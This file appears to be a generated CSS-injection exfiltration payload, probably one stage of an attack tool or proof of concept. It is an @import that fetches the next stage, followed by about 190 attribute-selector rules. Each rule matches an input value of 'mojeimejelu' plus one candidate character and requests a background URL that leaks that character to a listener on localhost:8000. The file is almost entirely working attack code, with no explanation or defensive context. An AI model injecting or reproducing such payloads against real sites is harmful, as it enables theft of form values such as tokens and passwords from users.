@import url("http://localhost:8000/?l=13");
input[value="mojeimejelu!"] {background: url("http://localhost:8000/?leak=!&q=0.8471038197286269");}
input[value="mojeimejelu\""] {background: url("http://localhost:8000/?leak=\"&q=0.5545638634551922");}
input[value="mojeimejelu#"] {background: url("http://localhost:8000/?leak=#&q=0.08831708422246343");}
input[value="mojeimejelu$"] {background: url("http://localhost:8000/?leak=$&q=0.04203042735580009");}
input[value="mojeimejelu%"] {background: url("http://localhost:8000/?leak=%&q=0.7700857149065106");}
input[value="mojeimejelu&"] {background: url("http://localhost:8000/?leak=&&q=0.7682398531530505");}
input[value="mojeimejelu'"] {background: url("http://localhost:8000/?leak='&q=0.1088485614956245");}
input[value="mojeimejelu("] {background: url("http://localhost:8000/?leak=(&q=0.7510498062886752");}
input[value="mojeimejelu)"] {background: url("http://localhost:8000/?leak=)&q=0.6052580515031187");}
input[value="mojeimejelu*"] {background: url("http://localhost:8000/?leak=*&q=0.48999656612201936");}
input[value="mojeimejelu+"] {background: url("http://localhost:8000/?leak=+&q=0.6611578711256043");}
input[value="mojeimejelu,"] {background: url("http://localhost:8000/?leak=,&q=0.736378022953865");}
input[value="mojeimejelu-"] {background: url("http://localhost:8000/?leak=-&q=0.2979344455657338");}
input[value="mojeimejelu."] {background: url("http://localhost:8000/?leak=.&q=0.9400651618461333");}
input[value="mojeimejelu/"] {background: url("http://localhost:8000/?leak=/&q=0.7908890361923651");}
input[value="mojeimejelu0"] {background: url("http://localhost:8000/?leak=0&q=0.4911413623482459");}
input[value="mojeimejelu1"] {background: url("http://localhost:8000/?leak=1&q=0.48728385896013404");}
input[value="mojeimejelu2"] {background: url("http://localhost:8000/?leak=2&q=0.20180186021411606");}
input[value="mojeimejelu3"] {background: url("http://localhost:8000/?leak=3&q=0.7717444874737693");}
input[value="mojeimejelu4"] {background: url("http://localhost:8000/?leak=4&q=0.0778726945436008");}
input[value="mojeimejelu5"] {background: url("http://localhost:8000/?leak=5&q=0.5453742489540163");}
input[value="mojeimejelu6"] {background: url("http://localhost:8000/?leak=6&q=0.34141530186563385");}
input[value="mojeimejelu7"] {background: url("http://localhost:8000/?leak=7&q=0.43167026236237827");}
input[value="mojeimejelu8"] {background: url("http://localhost:8000/?leak=8&q=0.2953811793181722");}
input[value="mojeimejelu9"] {background: url("http://localhost:8000/?leak=9&q=0.6291213219066654");}
input[value="mojeimejelu:"] {background: url("http://localhost:8000/?leak=:&q=0.3648964117570017");}
input[value="mojeimejelu;"] {background: url("http://localhost:8000/?leak=;&q=0.5045914945722041");}
input[value="mojeimejelu<"] {background: url("http://localhost:8000/?leak=<&q=0.32226786808443686");}
input[value="mojeimejelu="] {background: url("http://localhost:8000/?leak==&q=0.7563561115675446");}
input[value="mojeimejelu>"] {background: url("http://localhost:8000/?leak=>&q=0.11627266762174737");}
input[value="mojeimejelu?"] {background: url("http://localhost:8000/?leak=?&q=0.4099312044518122");}
input[value="mojeimejelu@"] {background: url("http://localhost:8000/?leak=@&q=0.8182143600199037");}
input[value="mojeimejeluA"] {background: url("http://localhost:8000/?leak=A&q=0.01396722538091777");}
input[value="mojeimejeluB"] {background: url("http://localhost:8000/?leak=B&q=0.139200207226591");}
input[value="mojeimejeluC"] {background: url("http://localhost:8000/?leak=C&q=0.7410671276507168");}
input[value="mojeimejeluD"] {background: url("http://localhost:8000/?leak=D&q=0.42811967770498294");}
input[value="mojeimejeluE"] {background: url("http://localhost:8000/?leak=E&q=0.29992942507632514");}
input[value="mojeimejeluF"] {background: url("http://localhost:8000/?leak=F&q=0.9944075484736288");}
input[value="mojeimejeluG"] {background: url("http://localhost:8000/?leak=G&q=0.5755418636981924");}
input[value="mojeimejeluH"] {background: url("http://localhost:8000/?leak=H&q=0.9173855158660917");}
input[value="mojeimejeluI"] {background: url("http://localhost:8000/?leak=I&q=0.9993824321627913");}
input[value="mojeimejeluJ"] {background: url("http://localhost:8000/?leak=J&q=0.6462761662792227");}
input[value="mojeimejeluK"] {background: url("http://localhost:8000/?leak=K&q=0.8237392673826458");}
input[value="mojeimejeluL"] {background: url("http://localhost:8000/?leak=L&q=0.31275118890994125");}
input[value="mojeimejeluM"] {background: url("http://localhost:8000/?leak=M&q=0.47111367113612546");}
input[value="mojeimejeluN"] {background: url("http://localhost:8000/?leak=N&q=0.4867362488483704");}
input[value="mojeimejeluO"] {background: url("http://localhost:8000/?leak=O&q=0.5981615076812139");}
input[value="mojeimejeluP"] {background: url("http://localhost:8000/?leak=P&q=0.17342039464337256");}
input[value="mojeimejeluQ"] {background: url("http://localhost:8000/?leak=Q&q=0.8004094654918954");}
input[value="mojeimejeluR"] {background: url("http://localhost:8000/?leak=R&q=0.0531379488816377");}
input[value="mojeimejeluS"] {background: url("http://localhost:8000/?leak=S&q=0.8801124828085176");}
input[value="mojeimejeluT"] {background: url("http://localhost:8000/?leak=T&q=0.10985192290531631");}
input[value="mojeimejeluU"] {background: url("http://localhost:8000/?leak=U&q=0.509308165479329");}
input[value="mojeimejeluV"] {background: url("http://localhost:8000/?leak=V&q=0.10007313697305142");}
input[value="mojeimejeluW"] {background: url("http://localhost:8000/?leak=W&q=0.7464777422341284");}
input[value="mojeimejeluX"] {background: url("http://localhost:8000/?leak=X&q=0.0558259010456017");}
input[value="mojeimejeluY"] {background: url("http://localhost:8000/?leak=Y&q=0.15972720431492782");}
input[value="mojeimejeluZ"] {background: url("http://localhost:8000/?leak=Z&q=0.8244155290947159");}
input[value="mojeimejelu["] {background: url("http://localhost:8000/?leak=[&q=0.2629637273977916");}
input[value="mojeimejelu\\"] {background: url("http://localhost:8000/?leak=\\&q=0.6124046192142945");}
input[value="mojeimejelu]"] {background: url("http://localhost:8000/?leak=]&q=0.76248435269255");}
input[value="mojeimejelu^"] {background: url("http://localhost:8000/?leak=^&q=0.017785265561525376");}
input[value="mojeimejelu_"] {background: url("http://localhost:8000/?leak=_&q=0.4795577217991507");}
input[value="mojeimejelu`"] {background: url("http://localhost:8000/?leak=`&q=0.14888326271709396");}
input[value="mojeimejelua"] {background: url("http://localhost:8000/?leak=a&q=0.9983248806183971");}
input[value="mojeimejelub"] {background: url("http://localhost:8000/?leak=b&q=0.15418617191763695");}
input[value="mojeimejeluc"] {background: url("http://localhost:8000/?leak=c&q=0.24129570310446402");}
input[value="mojeimejelud"] {background: url("http://localhost:8000/?leak=d&q=0.929568183367466");}
input[value="mojeimejelue"] {background: url("http://localhost:8000/?leak=e&q=0.8872485971349369");}
input[value="mojeimejeluf"] {background: url("http://localhost:8000/?leak=f&q=0.14238936675294322");}
input[value="mojeimejelug"] {background: url("http://localhost:8000/?leak=g&q=0.2596286513872148");}
input[value="mojeimejeluh"] {background: url("http://localhost:8000/?leak=h&q=0.6650629584664747");}
input[value="mojeimejelui"] {background: url("http://localhost:8000/?leak=i&q=0.5927322544609557");}
input[value="mojeimejeluj"] {background: url("http://localhost:8000/?leak=j&q=0.35983043213033006");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=k&q=0.6765090704281576");}
input[value="mojeimejelul"] {background: url("http://localhost:8000/?leak=l&q=0.6392480500466957");}
input[value="mojeimejelum"] {background: url("http://localhost:8000/?leak=m&q=0.5812877567594652");}
input[value="mojeimejelun"] {background: url("http://localhost:8000/?leak=n&q=0.4056249244389327");}
input[value="mojeimejeluo"] {background: url("http://localhost:8000/?leak=o&q=0.6890132887427991");}
input[value="mojeimejelup"] {background: url("http://localhost:8000/?leak=p&q=0.5823477891141113");}
input[value="mojeimejeluq"] {background: url("http://localhost:8000/?leak=q&q=0.18676230804397465");}
input[value="mojeimejelur"] {background: url("http://localhost:8000/?leak=r&q=0.31532600826866886");}
input[value="mojeimejelus"] {background: url("http://localhost:8000/?leak=s&q=0.7068182707092596");}
input[value="mojeimejelut"] {background: url("http://localhost:8000/?leak=t&q=0.20003982547059884");}
input[value="mojeimejeluu"] {background: url("http://localhost:8000/?leak=u&q=0.5781143130279986");}
input[value="mojeimejeluv"] {background: url("http://localhost:8000/?leak=v&q=0.6428837079294571");}
input[value="mojeimejeluw"] {background: url("http://localhost:8000/?leak=w&q=0.3223073810615953");}
input[value="mojeimejelux"] {background: url("http://localhost:8000/?leak=x&q=0.006718079883913486");}
input[value="mojeimejeluy"] {background: url("http://localhost:8000/?leak=y&q=0.22191277380079355");}
input[value="mojeimejeluz"] {background: url("http://localhost:8000/?leak=z&q=0.04832179476087983");}
input[value="mojeimejelu{"] {background: url("http://localhost:8000/?leak={&q=0.04644819682665324");}
input[value="mojeimejelu|"] {background: url("http://localhost:8000/?leak=|&q=0.7838000379342582");}
input[value="mojeimejelu}"] {background: url("http://localhost:8000/?leak=}&q=0.09174851766262715");}
input[value="mojeimejelu~"] {background: url("http://localhost:8000/?leak=~&q=0.377912423184666");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.6782345266545866");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.6870128053027218");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.7852116471644421");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.8218741083033383");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.4234175849655739");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.02359491011927939");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.6848563023239271");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.9829203244285083");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.5470608158541757");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.46047808140124746");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.5430591574786048");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.4435625508994099");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.4664143690988447");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.6271814522577299");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.7202959884021383");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.41442187636831584");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.5232398869098016");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.41285677846492863");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.21210508754585056");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.7013248991195338");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.5933502731807057");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.36395626946726223");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.5787728800671017");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.7459829401010287");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.6509786268044362");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.27797834682184575");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.07674403353903969");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.08085784962384235");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.2274578774679623");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.3492303733783759");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.15542721965541118");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.8469529170827172");}
input[value="mojeimejelu"] {background: url("http://localhost:8000/?leak=&q=0.8216779674046222");}
input[value="mojeimejelu "] {background: url("http://localhost:8000/?leak= &q=0.5439001519194773");}
input[value="mojeimejelu¡"] {background: url("http://localhost:8000/?leak=¡&q=0.8675730077254993");}
input[value="mojeimejelu¢"] {background: url("http://localhost:8000/?leak=¢&q=0.9843046565500111");}
input[value="mojeimejelu£"] {background: url("http://localhost:8000/?leak=£&q=0.4221219768572724");}
input[value="mojeimejelu¤"] {background: url("http://localhost:8000/?leak=¤&q=0.5285516963661325");}
input[value="mojeimejelu¥"] {background: url("http://localhost:8000/?leak=¥&q=0.04968524862856327");}
input[value="mojeimejelu¦"] {background: url("http://localhost:8000/?leak=¦&q=0.5927393233895717");}
input[value="mojeimejelu§"] {background: url("http://localhost:8000/?leak=§&q=0.14698393813853827");}
input[value="mojeimejelu¨"] {background: url("http://localhost:8000/?leak=¨&q=0.26032361206673227");}
input[value="mojeimejelu©"] {background: url("http://localhost:8000/?leak=©&q=0.28023066182489065");}
input[value="mojeimejeluª"] {background: url("http://localhost:8000/?leak=ª&q=0.5821399156793929");}
input[value="mojeimejelu«"] {background: url("http://localhost:8000/?leak=«&q=0.40835966018214664");}
input[value="mojeimejelu¬"] {background: url("http://localhost:8000/?leak=¬&q=0.657745590376474");}
input[value="mojeimejelu­"] {background: url("http://localhost:8000/?leak=­&q=0.2206804832896383");}
input[value="mojeimejelu®"] {background: url("http://localhost:8000/?leak=®&q=0.588700177745854");}
input[value="mojeimejelu¯"] {background: url("http://localhost:8000/?leak=¯&q=0.6539836273069146");}
input[value="mojeimejelu°"] {background: url("http://localhost:8000/?leak=°&q=0.33565238389632546");}
input[value="mojeimejelu±"] {background: url("http://localhost:8000/?leak=±&q=0.1616484456959002");}
input[value="mojeimejelu²"] {background: url("http://localhost:8000/?leak=²&q=0.7842975664552654");}
input[value="mojeimejelu³"] {background: url("http://localhost:8000/?leak=³&q=0.4726202157296724");}
input[value="mojeimejelu´"] {background: url("http://localhost:8000/?leak=´&q=0.3427639784816927");}
input[value="mojeimejeluµ"] {background: url("http://localhost:8000/?leak=µ&q=0.7289869935610549");}
input[value="mojeimejelu¶"] {background: url("http://localhost:8000/?leak=¶&q=0.5928268810935333");}
input[value="mojeimejelu·"] {background: url("http://localhost:8000/?leak=·&q=0.41681652660338786");}
input[value="mojeimejelu¸"] {background: url("http://localhost:8000/?leak=¸&q=0.20101873648421686");}
input[value="mojeimejelu¹"] {background: url("http://localhost:8000/?leak=¹&q=0.5411048827225149");}
input[value="mojeimejeluº"] {background: url("http://localhost:8000/?leak=º&q=0.9942663035844079");}
input[value="mojeimejelu»"] {background: url("http://localhost:8000/?leak=»&q=0.6970269367980102");}
input[value="mojeimejelu¼"] {background: url("http://localhost:8000/?leak=¼&q=0.16734571295568768");}
input[value="mojeimejelu½"] {background: url("http://localhost:8000/?leak=½&q=0.8947572315988808");}
input[value="mojeimejelu¾"] {background: url("http://localhost:8000/?leak=¾&q=0.6432272255362639");}
input[value="mojeimejelu¿"] {background: url("http://localhost:8000/?leak=¿&q=0.2040278420269217");}
input[value="mojeimejeluÀ"] {background: url("http://localhost:8000/?leak=À&q=0.14943356299470034");}
input[value="mojeimejeluÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.39561624455695377");}
input[value="mojeimejeluÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.4099052339675382");}
input[value="mojeimejeluÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.30427941405024317");}
input[value="mojeimejeluÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.5304867745610644");}
input[value="mojeimejeluÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.9362249631400807");}
input[value="mojeimejeluÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.1721265006478252");}
input[value="mojeimejeluÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.1489074713423486");}
input[value="mojeimejeluÈ"] {background: url("http://localhost:8000/?leak=È&q=0.782736561110968");}
input[value="mojeimejeluÉ"] {background: url("http://localhost:8000/?leak=É&q=0.5447537317419766");}
input[value="mojeimejeluÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.6288117213113638");}
input[value="mojeimejeluË"] {background: url("http://localhost:8000/?leak=Ë&q=0.5315585487903938");}
input[value="mojeimejeluÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.3424941970891715");}
input[value="mojeimejeluÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.6236538370311391");}
input[value="mojeimejeluÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.14034997187124798");}
input[value="mojeimejeluÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.10501201119512094");}
input[value="mojeimejeluÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.2516211812253415");}
input[value="mojeimejeluÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.7710007268611785");}
input[value="mojeimejeluÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.281444753635288");}
input[value="mojeimejeluÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.4952309084111448");}
input[value="mojeimejeluÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.16032315017245868");}
input[value="mojeimejeluÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.9705915837632888");}
input[value="mojeimejeluÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.3055278682932805");}
input[value="mojeimejelu×"] {background: url("http://localhost:8000/?leak=×&q=0.9617005156170082");}
input[value="mojeimejeluØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.22392276652118226");}
input[value="mojeimejeluÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.494867235724993");}
input[value="mojeimejeluÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.1561675235319775");}
input[value="mojeimejeluÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.573005309872648");}
input[value="mojeimejeluÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.4790183397685779");}
input[value="mojeimejeluÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.1418652469170334");}
input[value="mojeimejeluÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.018501825964325258");}
input[value="mojeimejeluß"] {background: url("http://localhost:8000/?leak=ß&q=0.5137968563786355");}
input[value="mojeimejeluà"] {background: url("http://localhost:8000/?leak=à&q=0.13710003125144454");}
input[value="mojeimejeluá"] {background: url("http://localhost:8000/?leak=á&q=0.8601095999549873");}
input[value="mojeimejeluâ"] {background: url("http://localhost:8000/?leak=â&q=0.02620642635723347");}
input[value="mojeimejeluã"] {background: url("http://localhost:8000/?leak=ã&q=0.15731394045187397");}
input[value="mojeimejeluä"] {background: url("http://localhost:8000/?leak=ä&q=0.3368184823480429");}
input[value="mojeimejeluå"] {background: url("http://localhost:8000/?leak=å&q=0.825781439656823");}
input[value="mojeimejeluæ"] {background: url("http://localhost:8000/?leak=æ&q=0.10369701458402902");}
input[value="mojeimejeluç"] {background: url("http://localhost:8000/?leak=ç&q=0.16923800688783985");}
input[value="mojeimejeluè"] {background: url("http://localhost:8000/?leak=è&q=0.9276679030913062");}
input[value="mojeimejelué"] {background: url("http://localhost:8000/?leak=é&q=0.7059363071101283");}
input[value="mojeimejeluê"] {background: url("http://localhost:8000/?leak=ê&q=0.038210840311222016");}
input[value="mojeimejeluë"] {background: url("http://localhost:8000/?leak=ë&q=0.04305891307917853");}
input[value="mojeimejeluì"] {background: url("http://localhost:8000/?leak=ì&q=0.6951754461678334");}
input[value="mojeimejeluí"] {background: url("http://localhost:8000/?leak=í&q=0.6774275309342965");}
input[value="mojeimejeluî"] {background: url("http://localhost:8000/?leak=î&q=0.6170755183513328");}
input[value="mojeimejeluï"] {background: url("http://localhost:8000/?leak=ï&q=0.0559945218843243");}
input[value="mojeimejeluð"] {background: url("http://localhost:8000/?leak=ð&q=0.09590085306912832");}
input[value="mojeimejeluñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.7967744187654444");}
input[value="mojeimejeluò"] {background: url("http://localhost:8000/?leak=ò&q=0.0038545263863292156");}
input[value="mojeimejeluó"] {background: url("http://localhost:8000/?leak=ó&q=0.9791987223605432");}
input[value="mojeimejeluô"] {background: url("http://localhost:8000/?leak=ô&q=0.4713985346822456");}
input[value="mojeimejeluõ"] {background: url("http://localhost:8000/?leak=õ&q=0.28881957031965144");}
input[value="mojeimejeluö"] {background: url("http://localhost:8000/?leak=ö&q=0.8913258382516163");}
input[value="mojeimejelu÷"] {background: url("http://localhost:8000/?leak=÷&q=0.14313587224008906");}
input[value="mojeimejeluø"] {background: url("http://localhost:8000/?leak=ø&q=0.5030897559291261");}
input[value="mojeimejeluù"] {background: url("http://localhost:8000/?leak=ù&q=0.6205578765499637");}
input[value="mojeimejeluú"] {background: url("http://localhost:8000/?leak=ú&q=0.8831822583742261");}
input[value="mojeimejeluû"] {background: url("http://localhost:8000/?leak=û&q=0.6949684976102177");}
input[value="mojeimejeluü"] {background: url("http://localhost:8000/?leak=ü&q=0.5889409571774482");}
input[value="mojeimejeluý"] {background: url("http://localhost:8000/?leak=ý&q=0.49140101304383155");}
input[value="mojeimejeluþ"] {background: url("http://localhost:8000/?leak=þ&q=0.1089012358815813");}
input[value="mojeimejeluÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.7848294749557538");}
